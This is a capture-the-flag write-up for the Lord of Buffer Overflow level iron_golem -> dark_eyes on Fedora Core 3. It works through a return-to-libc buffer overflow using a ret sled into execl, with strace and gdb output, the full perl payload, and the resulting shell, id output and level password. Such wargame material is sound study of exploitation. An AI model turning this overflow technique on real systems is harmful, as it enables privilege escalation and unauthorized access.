[LOB_FC3] iron_golem -> dark_eyes
#Env
- NX
- ascii armor
- random stack
#Technique
- Build the RTL (return-to-libc) argument layout with a &ret sled
dark_eyes.c source
A routine that restores the SFP has been added, and RET sledding is given as a hint. Since RET sledding does not need the SFP, the challenge can be solved the same way as the "gate->iron_golem" problem.
[Writing the payload]
[iron_golem@Fedora_1stFloor ~]$ strace -i ./dark_eyes `perl -e 'print "A"x270'`
[00004141] --- SIGSEGV (Segmentation fault) @ 0 (0) ---
upeek: ptrace(PTRACE_PEEKUSER,3094,48,0): No such process
[????????] +++ killed by SIGSEGV +++
[iron_golem@Fedora_1stFloor ~]$
=> Confirms the layout: 268 bytes of buffer followed by the 4-byte RET
(gdb) x/i 0x080484b9
0x80484b9 <main+177>: ret
(gdb) p execl
$2 = {<text variable, no debug info>} 0x7a5720 <execl>
(gdb) x/40x $esp+0x120
0xfef33920: 0x61616161 0x61616161 0x61616161 0x61616161
0xfef33930: 0x61616161 0x61616161 0x61616161 0x61616161
0xfef33940: 0x00000000 0xfef339c4 0xfef339d0 0x0070eab6
0xfef33950: 0x0083eff4 0x00000000 0xfef33950 0xfef33998
0xfef33960: 0xfef33940 0x00730df5 0x00000000 0x00000000
0xfef33970: 0x00000000 0x00718fb4 0x00000002 0x08048360
Attack code: ./dark_eyes "`perl -e 'print "a"x268, "\xb9\x84\x04\x08"x2, "\x20\x57\x7a"'`"
[iron_golem@Fedora_1stFloor ~]$ ./dark_eyes "`perl -e 'print "a"x268, "\xb9\x84\x04\x08"x2, "\x20\x57\x7a"'`"
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa삻蕓뭐 Wz
sh-3.00$ id
uid=502(dark_eyes) gid=502(dark_eyes) groups=501(iron_golem) context=user_u:system_r:unconfined_t
sh-3.00$ my-pass
euid = 502
because of you
sh-3.00$